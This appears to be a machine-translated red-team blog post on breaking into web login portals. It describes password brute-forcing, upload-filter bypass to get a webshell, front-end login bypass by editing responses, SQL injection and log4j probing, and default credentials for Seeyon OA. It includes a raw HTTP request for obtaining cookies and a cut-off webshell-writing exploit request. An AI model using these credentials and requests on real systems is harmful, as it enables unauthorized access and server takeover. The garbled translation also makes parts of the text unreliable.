Title: Share practical cases of Red Team's overseas network management

Break through from the most basic login box

The login box is the character with the most occurrences of hw and is also the easiest to get out of holes. Here are some of your commonly used test methods

Login blasting tips

We have two solutions to the explosion of systems like this:

Analyze the front-end encryption algorithm, write scripts to encrypt the password and fix the password to 123456 000000 The two methods of using common usernames as dictionary to blast the two methods have their own advantages and disadvantages. I prefer the second one, which will be more efficient in the game, and the analysis encryption algorithm is more suitable for the red team detection project.

Use the blasted account password to log in to the background, and you can continue to find the background upload point

See the image type here to restrict uploaded file format

Add aspx file format type directly

Successful getshell

Modify the return packet parameters and enter the background

Sometimes the website login status is judged based on the front-end, and at this time we can directly modify the return package to bypass it

The front-end judgment login logic is determined based on the ret value of the return package. When the return value is 1, the login will be successfully logged in.

Successfully entered the background

Plugin detects common SQL injection and log4j vulnerabilities

Recommended sql injection plug-in https://github.com/smxiazi/xia_sql

The basic principle is to determine whether there is injection by sending multiple data packets based on the returned data length.

In addition to passive scanning, we can also manually add single and double quotes to view the return package. If there is a similar error, there may be SQL injection.

SQLmap shuttle

log4j plugin recommended https://github.com/TheKingOfDuck/burpFakeIP

Header header through burp plugin fuzz packet

Successfully detected log4j vulnerability in login box

But it should be noted that many dnslog platforms have been marked black by firewalls, so it is recommended to use ceye or build a dnslog platform yourself

System default password + background 1day exploit

As offensive and defensive competitions become more and more frequent, there are fewer and fewer front-end vulnerabilities that can be directly exploited on the public network, and most of them have been fixed by batch scanning, but we can use the system's default password and combine it with 1day for utilization.

If the default password is present, admin/admin123

You can execute commands by scheduling tasks or deserializing them when entering the background.

Many times when we encounter OA systems, we use OA vulnerability detection tools to scan for no loopholes and give up. In fact, there may be a problem with default passwords in this kind of OA system.

Default Password

System Administrator: system/system

Group Administrator (A8-v5 Group Version) group-admin/123456

Unit Administrator (A8-V5 Enterprise Edition) admin1/admin123456

Audit Admin (all versions) audit-admin/seeyon123456

Sometimes you cannot log in when using your account password at the front desk. You can send the following data packet to get cookies.

POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

Content-Length: 71

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

UserAgentFrom=xxlogin_username=audit-adminlogin_password=seeyon123456

After obtaining the cookie, you can use the newer background hole of the patch for in-depth use. This time, use the copyfile background hole.

However, after actual combat, I found that there were some pitfalls in this loophole, and an error was reported when writing to the webshell.

POST /seeyon/ajax.do?method=ajaxActionmanagerName=portalCssManagerrnd=111 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded;charset=UTF-8

Content-Length: 70

Host: 192.168.91.17

Connection: Keep-Alive

User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)

Accept-Encoding: gzip,deflate

arguments=%5B%22